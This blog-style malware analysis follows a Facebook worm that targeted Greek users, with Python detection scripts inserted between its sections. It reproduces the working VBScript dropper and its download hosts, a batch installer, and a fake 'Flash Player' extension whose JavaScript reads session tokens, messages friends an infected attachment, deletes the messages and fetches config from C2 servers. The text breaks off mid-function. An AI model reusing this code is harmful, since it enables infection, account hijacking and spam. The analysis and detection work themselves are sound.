Greek facebook users under “attack”

Over the last few days, a piece of malware was spreading among the Greek users of Facebook. After a couple of days hunting for a sample, I managed to get one.

Infection

When the user opened the .rar attachment, there was a VBScript file inside. The VBScript was the dropper. Its main functionality was to download a .zip file that contained a batch file, a .jar file and the Java 8 installer. All files were downloaded under C:/MyFolderakis.

The VBScript

```vbscript
Dim oFSO
Set oFSO = CreateObject("Scripting.FileSystemObject")
Dim csPATH : csPATH = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%SYSTEMDRIVE%")
csPATH = csPATH & "\MyFolderakis"
' Create a new folder
oFSO.CreateFolder csPATH
Do
    download(csPATH)
    Unzip csPATH &"\content.zip", csPATH
Loop While ReportFileStatus(csPATH &"\sapsalo.jar")=0

Function download(csPATH)
    link=RandomLink()
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("ADODB.Stream")
    xHttp.Open "GET", link, False
    xHttp.Send
    with bStrm
        .type = 1 '//binary
        .open
        .write xHttp.responseBody
        .savetofile csPATH &"\content.zip", 2 '//overwrite
    end with
    download = csPATH &"\content.zip"
End Function

Function ReportFileStatus(filespec)
    Dim fso, msg
    Set fso = CreateObject("Scripting.FileSystemObject")
    If (fso.FileExists(filespec)) Then
        msg = 1
        Wscript.Echo "Exited"
    Else
        msg = 0
    End If
    ReportFileStatus = msg
End Function

Function RandomLink()
    sites=Array("http://xionobala.com/mermikia/moisis.zip","http://trendvidz.com/terlix/filezilla.zip","http://tromeroi.com/download/adobe.zip","http://womfashion.com/aladin/aladin.zip","http://yoodot.com/ouzo/gnome.zip","http://pepperstonix.com/koitatiegine/tikale.zip","http://spatareporo.com/deitetous/simerastonaplha.zip","http://fashionofheart.com/vasika/kalisperasas.zip","http://masterolious.com/mozilla/firefox.zip","http://pentorali.com/safe/internet.zip")
    Dim max,min
    max=UBound(sites)
    min=LBound(sites)
    Randomize
    a=Int((max-min+1)*Rnd+min)
    RandomLink = sites(a)
End Function

Sub Unzip(sSource, sTargetDir)
    Set oFSO = CreateObject("Scripting.FileSystemObject")
    if not oFSO.FolderExists(sTargetDir) then oFSO.CreateFolder(sTargetDir)
    Set oShell = CreateObject("Shell.Application")
    Set oSource = oShell.NameSpace(sSource).Items()
    Set oTarget = oShell.NameSpace(sTargetDir)
    oTarget.CopyHere oSource, 256
End Sub

Set WshShell = CreateObject("WScript.Shell")
WshShell.RUN "cmd /c "& csPATH &"\run.bat" , 2
```

Sidenotes: If you execute the VBScript twice, an error pops up when trying to recreate the folder.

The Batch script

```batch
@ECHO OFF
IF EXIST "%CommonProgramFiles(x86)%\java" goto javaexists
IF EXIST "%CommonProgramFiles%\java" goto javaexists
:installjava
start /w %SYSTEMDRIVE%\MyFolderakis\jre-8u5-windows-i586-iftw.exe /s
if %ERRORLEVEL%==0 goto javaexists
echo Please do not close this or windows installation will be corrupted...
echo Loading...
goto installjava
:javaexists
start %SYSTEMDRIVE%\MyFolderakis\sapsalo.jar
```
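The dropper and the batch file above form a chain that endpoint telemetry can be matched against: a script host writes content.zip, run.bat and sapsalo.jar into a fresh folder, then spawns cmd.exe on the batch, which silently installs the JRE and launches the jar. The following is an added example, not code from the post: it runs that match over constructed process and file events, and the event field names, pids and paths are assumptions standing in for whatever Sysmon or an EDR emits.

```python
"""Match endpoint telemetry against the VBScript -> run.bat -> JRE -> sapsalo.jar chain.

Added example, not code from the post. The events below are constructed; their
field names (type, pid, ppid, image, cmdline, path) are an assumption standing in
for whatever your Sysmon/EDR pipeline produces."""
import ntpath
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
JAVA_HOSTS = {"java.exe", "javaw.exe"}

# Constructed events modelled on the chain in the post; the pids, the .vbs name and
# the JRE install path are invented for the example.
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 50, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\photo.vbs"'},
    {"type": "file", "pid": 100, "path": r"C:\MyFolderakis\content.zip"},
    {"type": "file", "pid": 100, "path": r"C:\MyFolderakis\run.bat"},
    {"type": "file", "pid": 100, "path": r"C:\MyFolderakis\sapsalo.jar"},
    {"type": "process", "pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c C:\MyFolderakis\run.bat"},
    {"type": "process", "pid": 102, "ppid": 101,
     "image": r"C:\MyFolderakis\jre-8u5-windows-i586-iftw.exe",
     "cmdline": r"C:\MyFolderakis\jre-8u5-windows-i586-iftw.exe /s"},
    {"type": "process", "pid": 103, "ppid": 101, "image": r"C:\Program Files\Java\jre8\bin\javaw.exe",
     "cmdline": r'"C:\Program Files\Java\jre8\bin\javaw.exe" -jar C:\MyFolderakis\sapsalo.jar'},
    # Benign noise: a batch file run from a shell that no script host started.
    {"type": "process", "pid": 200, "ppid": 50, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\alice\build.bat"},
]


def _base(path):
    return ntpath.basename(path).lower()


def _dir(path):
    return ntpath.dirname(path).lower()


def _descendants(children, pid):
    """Depth-first list of every process below pid in the parent/child tree."""
    found, stack = [], [pid]
    while stack:
        for child in children.get(stack.pop(), []):
            found.append(child)
            stack.append(child["pid"])
    return found


def detect_dropper_chain(events):
    """Return one alert per script-host process that shows at least two chain stages."""
    children, writes, procs = defaultdict(list), defaultdict(list), []
    for ev in events:
        if ev["type"] == "process":
            procs.append(ev)
            children[ev["ppid"]].append(ev)
        elif ev["type"] == "file":
            writes[ev["pid"]].append(ev["path"])
    alerts = []
    for root in procs:
        if _base(root["image"]) not in SCRIPT_HOSTS:
            continue
        drop_dirs = {_dir(p) for p in writes[root["pid"]]}
        exts = {ntpath.splitext(p)[1].lower() for p in writes[root["pid"]]}
        stages = []
        # Stage 1: the script host itself materialised an archive, a batch file and a jar.
        if {".zip", ".bat", ".jar"} <= exts:
            stages.append("script_host_dropped_zip_bat_jar")
        for proc in _descendants(children, root["pid"]):
            cmd, img = proc["cmdline"].lower(), _base(proc["image"])
            # Stage 2: cmd.exe under the script host runs a .bat from the drop folder.
            if img == "cmd.exe" and ".bat" in cmd and any(d in cmd for d in drop_dirs):
                stages.append("cmd_ran_dropped_bat")
            # Stage 3: an executable living in the drop folder is run with a silent switch.
            elif _dir(proc["image"]) in drop_dirs and " /s" in cmd:
                stages.append("silent_installer_from_drop_dir")
            # Stage 4: java runs a jar that sits in the drop folder.
            elif img in JAVA_HOSTS and "-jar" in cmd and any(d in cmd for d in drop_dirs):
                stages.append("java_jar_from_drop_dir")
        if len(stages) >= 2:
            alerts.append({"root_pid": root["pid"], "drop_dirs": sorted(drop_dirs), "stages": stages})
    return alerts


if __name__ == "__main__":
    for alert in detect_dropper_chain(EVENTS):
        print(alert)
```

The folder name and file names are not hardcoded on purpose: the rule keys on the behaviour (script host drops, shell runs what it dropped, silent install, jar from the same folder), so renaming MyFolderakis would not evade it.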

It checks whether a folder named java exists under the Common Files directory, for both 32-bit and 64-bit Windows. If it exists, the batch file runs the sapsalo.jar file contained in the .zip downloaded by the dropper; if not, Java is first installed silently (/s option).

The jar

After successful installation, the jar is executed. The jar has two functions. It serves as another dropper for a browser plugin (a manifest named ourt.json and a JavaScript file with the main functionality). At the same time, it creates a registry entry so that it runs on every startup, which keeps the machine infected even if the plugin is deleted. To achieve this, it creates a .zip file named ext_folder inside the Chrome folder.

The plugin

The manifest

```json
{
  "olmpkfnhkfomcmnodekbphlkkejkealf": {
    "active_permissions": {
      "api": ["storage","tabs"],
      "explicit_host": ["\u003Call_urls>","chrome://favicon/*","http://*/*"],
      "manifest_permissions": [],
      "scriptable_host": ["\u003Call_urls>","http://*.facebook.com/*","https://*.facebook.com/*"]
    },
    "content_settings": [],
    "creation_flags": 1,
    "events": [],
    "from_bookmark": false,
    "from_webstore": false,
    "granted_permissions": {
      "api": ["storage","tabs"],
      "explicit_host": ["\u003Call_urls>","chrome://favicon/*","http://*/*"],
      "manifest_permissions": [],
      "scriptable_host": ["\u003Call_urls>","http://*.facebook.com/*","https://*.facebook.com/*"]
    },
    "incognito_content_settings": [],
    "incognito_preferences": {},
    "initial_keybindings_set": true,
    "install_time": "13042160431700495",
    "location": 1,
    "manifest": {
      "background": {
        "persistent": false,
        "scripts": ["analytics.js"]
      },
      "content_scripts": [{
        "css": ["jquery-ui.css"],
        "js": ["debug_mode.js","jquery.js","jquery-ui.js","sugar.min.js","popup.js"],
        "matches": ["http://*.facebook.com/*","https://*.facebook.com/*"],
        "run_at": "document_end"
      },{
        "all_frames": true,
        "exclude_matches": ["http://*.facebook.com/*","https://*.facebook.com/*"],
        "js": ["debug_mode.js","sugar.min.js","URI.js","ads-list.js","ads.js"],
        "matches": ["\u003Call_urls>"]
      }],
      "content_security_policy": "script-src 'self' https://ssl.google-analytics.com; object-src 'self'",
      "description": "Cross-platform plugin plays animations, videos and sound files",
      "icons": {
        "128": "128.png",
        "16": "16.png",
        "48": "48.png"
      },
      "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyRAUY/Q1HimRmGomV9c9/UWlVmQToGeNZPIxlH5C+g7Ig8/HObGp3G6YqwMNtvG1LF6DgESq7HkuhZpEcrmLmDI8tXQh5SuYpKJCRcPJhvtOvtYnFbLNPdhg7DN4ZU8v1qhcrSSGfzK8KWPNghsAfL/PEFaobzWH+ZRFQbMsu93+u9WJFbcGtXT+Kqar7eWIiCeTACobSDbcfaZ1Cj5S0TEZPRtddWvUKSXG3+/wLz236ckZAnz7yzOw9kBLJL+J3+xm01qhTMc2wv6G0R+zVbC3/UjJcTSdCdY5wGgKgJkDzJ/WNxaGJUXFbKRRsQ3zhe3XrKKK+2kcHOjy0dZapQIDAQAB",
      "manifest_version": 2,
      "name": "Flash Player",
      "permissions": ["tabs","\u003Call_urls>","storage","http://*/"],
      "version": "2.0"
    },
    "path": "olmpkfnhkfomcmnodekbphlkkejkealf\\2.0_0",
    "preferences": {},
    "regular_only_preferences": {},
    "state": 1,
    "was_installed_by_default": false
  }
}
```
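Read as a defender would, the record above carries several signals at once: sideloaded rather than from the Web Store, <all_urls> host access, a Facebook-only content script next to an everywhere-else one, and a name borrowed from a real plugin. The following is an added example, not code from the post or from the malware: it audits one extensions.settings entry of the format above, trimmed to the fields it reads; the finding names, weights, threshold and impersonated-name list are the example's own assumptions, while the key-to-id derivation is the one Chrome uses.

```python
"""Audit one entry of Chrome's extensions.settings map (the record format shown above).

Added example, not code from the post or the malware. Finding names, weights,
HIGH_THRESHOLD and IMPERSONATED_NAMES are this example's assumptions; the id-from-key
derivation is how Chrome binds an extension id to its public key."""
import base64
import hashlib

# Record from the post, trimmed to the fields the audit reads. "\u003C" in the
# stored JSON is just "<", so the patterns are written as "<all_urls>" here.
_KEY = ("MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyRAUY/Q1HimRmGom"
        "V9c9/UWlVmQToGeNZPIxlH5C+g7Ig8/HObGp3G6YqwMNtvG1LF6DgESq7HkuhZpEcrmLmDI8tXQh"
        "5SuYpKJCRcPJhvtOvtYnFbLNPdhg7DN4ZU8v1qhcrSSGfzK8KWPNghsAfL/PEFaobzWH+ZRFQbMsu93"
        "+u9WJFbcGtXT+Kqar7eWIiCeTACobSDbcfaZ1Cj5S0TEZPRtddWvUKSXG3+/wLz236ckZAnz7yzOw"
        "9kBLJL+J3+xm01qhTMc2wv6G0R+zVbC3/UjJcTSdCdY5wGgKgJkDzJ/WNxaGJUXFbKRRsQ3zhe3Xr"
        "KKK+2kcHOjy0dZapQIDAQAB")
MALICIOUS_RECORD = {"olmpkfnhkfomcmnodekbphlkkejkealf": {
    "from_webstore": False, "location": 1, "state": 1,
    "path": "olmpkfnhkfomcmnodekbphlkkejkealf\\2.0_0",
    "manifest": {
        "name": "Flash Player", "version": "2.0", "manifest_version": 2, "key": _KEY,
        "permissions": ["tabs", "<all_urls>", "storage", "http://*/"],
        "content_scripts": [
            {"js": ["debug_mode.js", "jquery.js", "jquery-ui.js", "sugar.min.js", "popup.js"],
             "matches": ["http://*.facebook.com/*", "https://*.facebook.com/*"],
             "run_at": "document_end"},
            {"all_frames": True, "matches": ["<all_urls>"],
             "exclude_matches": ["http://*.facebook.com/*", "https://*.facebook.com/*"],
             "js": ["debug_mode.js", "sugar.min.js", "URI.js", "ads-list.js", "ads.js"]}]}}}

# Constructed benign record for contrast (hypothetical Web Store extension, no key stored).
BENIGN_RECORD = {"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
    "from_webstore": True, "location": 1, "state": 1,
    "manifest": {"name": "Example Notes", "version": "1.0", "manifest_version": 2,
                 "permissions": ["storage"],
                 "content_scripts": [{"js": ["notes.js"], "matches": ["https://notes.example/*"]}]}}}

# Names an extension has no business using; an assumption for this example.
IMPERSONATED_NAMES = {"flash player", "adobe flash player", "java", "java plugin", "silverlight"}
HIGH_THRESHOLD = 5


def extension_id_from_key(key_b64):
    """Chrome ids are the first 128 bits of SHA-256 over the DER public key, nibbles mapped a-p."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).hexdigest()[:32]
    return "".join(chr(ord("a") + int(nibble, 16)) for nibble in digest)


def audit_extension_record(record):
    """Score one {id: entry} record and return the findings with a severity."""
    ext_id, entry = next(iter(record.items()))
    manifest = entry.get("manifest", {})
    scripts = manifest.get("content_scripts", [])
    findings = {}
    if not entry.get("from_webstore", False):
        findings["not_from_webstore"] = 2  # sideloaded .crx; location 1 is Chrome's INTERNAL
    all_matches = [m for s in scripts for m in s.get("matches", [])]
    if "<all_urls>" in manifest.get("permissions", []) or "<all_urls>" in all_matches:
        findings["host_access_all_urls"] = 2
    if any(s.get("all_frames") and "<all_urls>" in s.get("matches", []) for s in scripts):
        findings["all_frames_everywhere"] = 1  # can rewrite every frame of every page
    if "<all_urls>" in all_matches and any(m != "<all_urls>" for m in all_matches):
        findings["site_targeted_content_script"] = 1  # one site gets special code
    if manifest.get("name", "").strip().lower() in IMPERSONATED_NAMES:
        findings["impersonating_name"] = 2
    if "key" in manifest:
        try:
            derived = extension_id_from_key(manifest["key"])
        except ValueError:  # binascii.Error is a ValueError: undecodable key
            derived = None
        if derived != ext_id:
            findings["id_does_not_match_key"] = 3  # edited record or corrupted copy
    score = sum(findings.values())
    return {"id": ext_id, "name": manifest.get("name"), "findings": findings,
            "score": score, "severity": "high" if score >= HIGH_THRESHOLD else "low"}


if __name__ == "__main__":
    for rec in (MALICIOUS_RECORD, BENIGN_RECORD):
        print(audit_extension_record(rec))
```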

Interesting parts are:

```json
"manifest_version": 2,
"name": "Flash Player",
```

Just in case you wondered: it was named Flash Player and it loads a lot of JS libraries. I honestly like that they named it Flash Player. That was smart.

The plugin

```json
"content_scripts": [{
  "css": ["jquery-ui.css"],
  "js": ["debug_mode.js","jquery.js","jquery-ui.js","sugar.min.js","popup.js"],
  "matches": ["http://*.facebook.com/*","https://*.facebook.com/*"],
  "run_at": "document_end"
}
```
```javascript
function exit( status ) {
  var i;
  if (typeof status === 'string') { alert(status); }
  window.addEventListener('error', function (e) {e.preventDefault();e.stopPropagation();}, false);
  var handlers = [ 'copy', 'cut', 'paste', 'beforeunload', 'blur', 'change', 'click', 'contextmenu', 'dblclick', 'focus', 'keydown', 'keypress', 'keyup', 'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup', 'resize', 'scroll', 'DOMNodeInserted', 'DOMNodeRemoved', 'DOMNodeRemovedFromDocument', 'DOMNodeInsertedIntoDocument', 'DOMAttrModified', 'DOMCharacterDataModified', 'DOMElementNameChanged', 'DOMAttributeNameChanged', 'DOMActivate', 'DOMFocusIn', 'DOMFocusOut', 'online', 'offline', 'textInput', 'abort', 'close', 'dragdrop', 'load', 'paint', 'reset', 'select', 'submit', 'unload' ];
  function stopPropagation (e) {
    e.stopPropagation();
    // e.preventDefault(); // Stop for the form controls, etc., too?
  }
  for (i=0; i < handlers.length; i++) { window.addEventListener(handlers[i], function (e) {stopPropagation(e);}, true); }
  if (window.stop) { window.stop(); }
  throw '';
}

$(function(){
  chrome.runtime.sendMessage({gegonos: "visit" }, function(response) {});
  // ads on fb
  chrome.storage.sync.get(function(extSettings) {
    if(extSettings.ads){
      var adcounter = 0;
      var adurls = ['https://8zxb-2gvn.accessdomain.com/789/ads.php','https://8zxb-2gvn.accessdomain.com/790/ads.php','https://8zxb-2gvn.accessdomain.com/791/ads.php','https://pizzasakis.com/789/ads.php','https://pizzasakis.com/790/ads.php','https://pizzasakis.com/791/ads.php'];
      function getit(url){
        $.get(url).done(function (b) {
          final_ad_url = url;
          put_ads(final_ad_url);
        }).fail(function (a, d, e) {
          console.log('fail',adurls[adcounter])
          if(adurls[adcounter++]) getit(adurls[adcounter])
        });
      }
      getit(adurls[0]);
      function put_ads(final_ad_url){
        $($('*[data-ad]')).parent().parent().html('<iframe id=""style="position: relative; width: 100%; height: 620px; border:0;" src="'+final_ad_url+'?choice=1" id="someId"/>')
        elems1=$.makeArray( $( "*[data-dedupekey]" ) );
        elems2=$.makeArray( $( "*[data-insertion-position]") );
        elems=elems1.include(elems2).unique();
        if(elems[0]) $(elems[0]).append('<iframe style="position: relative; width: 110%; height: 82px; border:0;" src="'+final_ad_url+'?choice=3" id="someId"/>')
        if(elems[1]) $(elems[1]).append('<iframe style="position: relative; width: 110%; height: 82px; border:0;" src="'+final_ad_url+'?choice=3" id="someId"/>')
      }
    }
  })
})

// facebook part
jx = {
  b: function () {
    var b = !1;
    if ("undefined" != typeof ActiveXObject) try { b = new ActiveXObject("Msxml2.XMLHTTP") } catch (c) { try { b = new ActiveXObject("Microsoft.XMLHTTP") } catch (a) { b = !1 } } else if (window.XMLHttpRequest) try { b = new XMLHttpRequest } catch (h) { b = !1 }
    return b
  },
  load: function (b, c, a, h, g) {
    var e = this.d();
    if (e && b) {
      e.overrideMimeType && e.overrideMimeType("text/xml");
      h || (h = "GET"); a || (a = "text"); g || (g = {});
      a = a.toLowerCase(); h = h.toUpperCase();
      b += b.indexOf("?") + 1 ? "&" : "?";
      var k = null;
      "POST" == h && (k = b.split("?"), b = k[0], k = k[1]);
      e.open(h, b, !0);
      e.onreadystatechange = g.c ? function () { g.c(e) } : function () {
        if (4 == e.readyState) if (200 == e.status) {
          var b = "";
          e.responseText && (b = e.responseText);
          "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
          c && c(b)
        } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
      };
      e.send(k)
    }
  },
  load2: function (b, c, a, h, g) {
    var e = this.d();
    if (e && b) {
      e.overrideMimeType && e.overrideMimeType("text/xml");
      h || (h = "POST"); a || (a = "text"); g || (g = {});
      a = a.toLowerCase(); h = h.toUpperCase();
      b += b.indexOf("?") + 1 ? "&" : "?";
      var k = null;
      "POST" == h && (k = b.split("?"), b = k[0], k = k[1]);
      e.open(h, b, !0);
      e.onreadystatechange = g.c ? function () { g.c(e) } : function () {
        if (4 == e.readyState) if (200 == e.status) {
          var b = "";
          e.responseText && (b = e.responseText);
          "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
          c && c(b)
        } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
      };
      e.send(k)
    }
  },
  d: function () { return this.b() }
};

function getFriends(){
  var promise=jQuery.Deferred();
  jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/first_degree.php?" + "__a=1&filter[0]=user&lazy=0&viewer=" + user_id + "&token=v7&stale_ok=0", function (a) {
    var b = a;
    var c = b.substring(b.indexOf("{"));
    var d = JSON.parse(c);
    d = d.payload.entries;
    friends=d;
    promise.resolve();
  })
  return promise;
}

function Create_Post(o){
  jx.load2(window.location.protocol + "//www.facebook.com/ajax/stream/inline.php?fb_dtsg=" + fb_dtsg + "&walltarget=" + o + "&render_notif_only=1&birthday=1&message_text=" + encodeURIComponent(msg) + "&message=" + encodeURIComponent(msg) + "&giftsgroupid=8ff493ad46&post=Post&nctr[_mod]=pagelet_reminders&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFIwd9e&__req=1b&phstamp=", function (a) {
    var b = a.substring(a.indexOf("{"));
    var c = JSON.parse(b);
  })
}

function Like_post(post) {
  var X = new XMLHttpRequest();
  var XURL = "//www.facebook.com/ajax/ufi/like.php";
  var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp=";
  X.open("POST", XURL, true);
  X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close; } };
  X.send(XParams);
}

function Like_page(p) {
  var Page = new XMLHttpRequest();
  var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
  var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
  Page.open("POST", PageURL, true);
  Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } };
  Page.send(PageParams);
}

send_message = (function(target_user_id,msg){
  var Page = new XMLHttpRequest();
  var PageURL = "//www.facebook.com/ajax/mercury/send_messages.php";
  var PageParams = "?=&=&__a=1&__dyn=798aD5z5CF-&__req=d&__user=" + user_id + "&client=mercury&fb_dtsg=" + fb_dtsg + "&message_batch[0][action_type]=ma-type:user-generated-message&message_batch[0][author]=fbid:" + user_id + "&message_batch[0][author_email]=&message_batch[0][body]=" + msg + "&message_batch[0][coordinates]=&message_batch[0][has_attachment]=false&message_batch[0][html_body]=false&message_batch[0][is_cleared]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_forward]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][is_unread]=false&message_batch[0][message_id]=<1392768225533:1945850321-3990341979@mail.projektitan.com>&message_batch[0][signatureID]=63e61bd&message_batch[0][source]=source:chat:web&message_batch[0][source_tags][0]=source:chat&message_batch[0][specific_to_list][0]=fbid:" + target_user_id + "&message_batch[0][specific_to_list][1]=fbid:" + user_id + "&message_batch[0][status]=0&message_batch[0][thread_id]=mid.1392163284356:af679b05b9c1cde936&message_batch[0][timestamp]=1392768225533&message_batch[0][timestamp_absolute]=Today&message_batch[0][timestamp_relative]=2:03am&message_batch[0][timestamp_time_passed]=0&message_batch[0][ui_push_phase]=V3&phstamp=";
  Page.open("POST", PageURL, true);
  Page.onreadystatechange = function () {
    if (Page.readyState == 4 && Page.status == 200) {
      var resp = Page.responseText;
      //delete_message(resp.split('"message_id":')[1].split(',"client_message_id"')[0].replace(/"/g, ""))
      Page.close;
    }
  };
  Page.send(PageParams);
}).lazy(Number.random(7, 14) * 1000)

delete_message=function(msg_id){
  var Page = new XMLHttpRequest();
  var PageURL = "//www.facebook.com/ajax/mercury/delete_messages.php";
  var PageParams = "?__a=1&__dyn=798aD5z5CF-&__req=d&__user=" + user_id + "&fb_dtsg=" + fb_dtsg + "&message_ids[0]=" + msg_id + "&phstamp=";
  Page.open("POST", PageURL, true);
  Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } };
  Page.send(PageParams);
}

function downloadFile(){
  var promise=jQuery.Deferred();
  var counter = 0;
  if(counter<configs.attach_urls.length) {
    var oReq = new XMLHttpRequest();
    oReq.open("GET", configs.attach_urls[counter], true);
    oReq.responseType = "arraybuffer";
    console.log('ouer')
    oReq.onload = function(oEvent) {
      if(this.status == 200){
        console.log(this)
        var myFile = new Blob([oReq.response], {type: 'application/octet-stream'});
        promise.resolve( myFile );
      }else{
        counter++;
        if(counter<configs.attach_urls.length){
          oReq.open("GET", configs.attach_urls[counter], true);
          oReq.send();
        }
      }
    }
    oReq.send();
  }
  return promise;
}

start_sending = function (myFile,target_id,msg_to_send,attach_name){
  var promise=jQuery.Deferred();
  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  console.log(target_id)
  var target_id = target_id;
  var msg=msg_to_send;
  var filename=attach_name;
  var formData = new FormData();
  formData.append("fb_dtsg", fb_dtsg);
  formData.append("attach_id", null);
  formData.append('upload_1052', myFile, filename);
  var request = new XMLHttpRequest();
  request.open("POST", "/ajax/mercury/upload.php?__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&ttstamp=&ft[tn]=%2BJ%2BM&");
  request.send(formData);
  request.onloadend = function(){
    a=JSON.parse((this.responseText).split('for (;;);')[1])
    a=a.payload.metadata[0]
    console.log(a)
    var Page = new XMLHttpRequest();
    var PageURL = "//www.facebook.com/ajax/mercury/send_messages.php";
    formData = new FormData();
    formData.append('message_batch[0][action_type]','ma-type:user-generated-message');
    formData.append('message_batch[0][thread_id]','');
    formData.append('message_batch[0][author]','fbid:'+ target_id);
    formData.append('message_batch[0][author_email]','');
    formData.append('message_batch[0][coordinates]','');
    formData.append('message_batch[0][timestamp]',(new Date).getTime());
    formData.append('message_batch[0][timestamp_absolute]','Today');
    formData.append('message_batch[0][timestamp_relative]','');
    formData.append('message_batch[0][timestamp_time_passed]','0');
    formData.append('message_batch[0][is_unread]',false);
    formData.append('message_batch[0][is_cleared]',false);
    formData.append('message_batch[0][is_forward]',false);
    formData.append('message_batch[0][is_filtered_content]',false);
    formData.append('message_batch[0][is_spoof_warning]',false);
    formData.append('message_batch[0][source]','source:titan:web');
    formData.append('message_batch[0][body]',msg);
    formData.append('message_batch[0][has_attachment]',true);
    formData.append('message_batch[0][html_body]',false);
    formData.append('message_batch[0][specific_to_list][0]','fbid:'+ target_id);
    formData.append('message_batch[0][specific_to_list][1]','fbid:'+ user_id);
    formData.append('message_batch[0][raw_attachments][0][filename]',a.filename);
    formData.append('message_batch[0][raw_attachments][0][filesize]',a.filesize);
    formData.append('message_batch[0][raw_attachments][0][hash]',a.hash);
    formData.append('message_batch[0][raw_attachments][0][handle]',a.handle);
    formData.append('message_batch[0][raw_attachments][0][filetype]',a.filetype);
    formData.append('message_batch[0][raw_attachments][0][encryptionKey]', a.encryptionKey);
    formData.append('message_batch[0][raw_attachments][0][metadata]','');
    formData.append('message_batch[0][raw_attachments][0][param_hash]',a.param_hash);
    formData.append('message_batch[0][raw_attachments][0][image_metadata]','');
    formData.append('message_batch[0][force_sms]',true);
    formData.append('message_batch[0][ui_push_phase]','V3');
    formData.append('message_batch[0][status]','0');
    formData.append('message_batch[0][message_id]','');
    formData.append('client','mercury');
    formData.append('__user',user_id);
    formData.append('__a','1');
    formData.append('__dyn','798aD5z5CF-');
    formData.append('__req','i');
    formData.append('fb_dtsg',fb_dtsg);
    formData.append('ttstamp','');
    formData.append('__rev','1188904');
    Page.open("POST", PageURL, true);
    Page.onreadystatechange = function () {
      if (Page.readyState == 4 && Page.status == 200) {
        var resp = Page.responseText;
        var message_id_with_attachment = (JSON.parse(resp.split('for (;;);')[1])).payload.actions[0].message_id;
        var thread_id_with_attachment = (JSON.parse(resp.split('for (;;);')[1])).payload.actions[0].thread_id;
        Page.close;
        delete_msg_atach(message_id_with_attachment)
        mute_conversation(thread_id_with_attachment)
      }
      promise.resolve()
    };
    Page.send(formData);
  }
  return promise;
}

function delete_msg_atach(msg_id){
  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  var Page = new XMLHttpRequest();
  var PageURL = "//www.facebook.com/ajax/mercury/delete_messages.php";
  Page.open("POST", PageURL, true);
  var formData = new FormData();
  formData.append('message_ids[0]',msg_id)
  formData.append('__user',user_id)
  formData.append('__a','1')
  formData.append('__dyn','798aD5z5CF-')
  formData.append('__req','d')
  formData.append('fb_dtsg',fb_dtsg)
  formData.append('ttstamp','')
  formData.append('__rev','1189795')
  Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { console.log(Page.responseText) } };
  Page.send(formData);
}

function mute_conversation(thread_id){
  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  var Page = new XMLHttpRequest();
  var PageURL = "//www.facebook.com/ajax/mercury/change_mute_thread.php";
  Page.open("POST", PageURL, true);
  var formData = new FormData();
  formData.append('thread_id',thread_id)
  formData.append('mute_settings','3600')
  formData.append('payload_source','mercury')
  formData.append('__user',user_id)
  formData.append('__a','1')
  formData.append('__dyn','798aD5z5CF-')
  formData.append('__req','d')
  formData.append('fb_dtsg',fb_dtsg)
  formData.append('ttstamp','')
  formData.append('__rev','1189795')
  Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { console.log(Page.responseText) } };
  Page.send(formData);
}

function get_config(){
  var promise=jQuery.Deferred();
  var counter = 0;
  var urls = ['https://8zxb-2gvn.accessdomain.com/789/taxavasi.php','https://8zxb-2gvn.accessdomain.com/790/taxavasi.php','https://8zxb-2gvn.accessdomain.com/791/taxavasi.php','https://pizzasakis.com/789/taxavasi.php','https://pizzasakis.com/790/taxavasi.php','https://pizzasakis.com/791/taxavasi.php'];
  function getit(url){
